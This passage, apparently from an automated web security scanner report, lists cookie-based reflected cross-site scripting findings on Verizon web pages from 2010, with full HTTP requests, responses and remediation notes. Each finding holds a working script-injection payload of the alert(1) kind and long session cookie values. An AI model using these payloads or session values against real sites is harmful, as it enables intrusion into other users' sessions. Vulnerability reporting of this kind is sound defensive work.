NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 83928
Expires: Sat, 20 Nov 2010 03:26:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:26:49 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:26:49 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:26:49 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:26:49 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:26:49 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "c5f5c"-alert(1)-"f31c76e7900"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: document.getElementB
...[SNIP]...

2.945. http://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/labs/labs.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload be037'><script>alert(1)</script>dda3558085e was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/labs/labs.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXbe037'><script>alert(1)</script>dda3558085e; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78167
Expires: Sat, 20 Nov 2010 03:26:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:26:42 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:26:42 GMT; path=/
Set-Cookie: ContextInfo_State=TXbe037'><script>alert(1)</script>dda3558085e; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:26:42 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:26:42 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:26:42 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXBE037'><SCRIPT>ALERT(1)</SCRIPT>DDA3558085E ' />
...[SNIP]...

2.946. http://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [dotcomsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/labs/labs.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24c27"-alert(1)-"14f3800e5f3 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/aboutFiOS/labs/labs.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=24c27"-alert(1)-"14f3800e5f3; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 83946
Expires: Sat, 20 Nov 2010 03:26:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:26:36 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:26:35 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:26:35 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:26:35 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:26:35 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "24c27"-alert(1)-"14f3800e5f3"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: document.getElementB
...[SNIP]...

2.947. http://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/labs/labs.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ab065'><script>alert(1)</script>e9047e9551f was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/labs/labs.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXab065'><script>alert(1)</script>e9047e9551f; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78167
Expires: Sat, 20 Nov 2010 00:11:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:29 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:29 GMT; path=/
Set-Cookie: ContextInfo_State=TXab065'><script>alert(1)</script>e9047e9551f; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:29 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:29 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:29 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXAB065'><SCRIPT>ALERT(1)</SCRIPT>E9047E9551F ' />
...[SNIP]...

2.948. http://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/reviews/reviews.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 38558'><script>alert(1)</script>e988cf76eb0 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/reviews/reviews.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX38558'><script>alert(1)</script>e988cf76eb0; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73429
Expires: Sat, 20 Nov 2010 03:27:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:27:30 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:27:30 GMT; path=/
Set-Cookie: ContextInfo_State=TX38558'><script>alert(1)</script>e988cf76eb0; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:27:30 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:27:30 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:27:30 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX38558'><SCRIPT>ALERT(1)</SCRIPT>E988CF76EB0 ' />
...[SNIP]...

2.949. http://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [dotcomsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/reviews/reviews.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bab89"-alert(1)-"05b4fbb714d was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/aboutFiOS/reviews/reviews.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
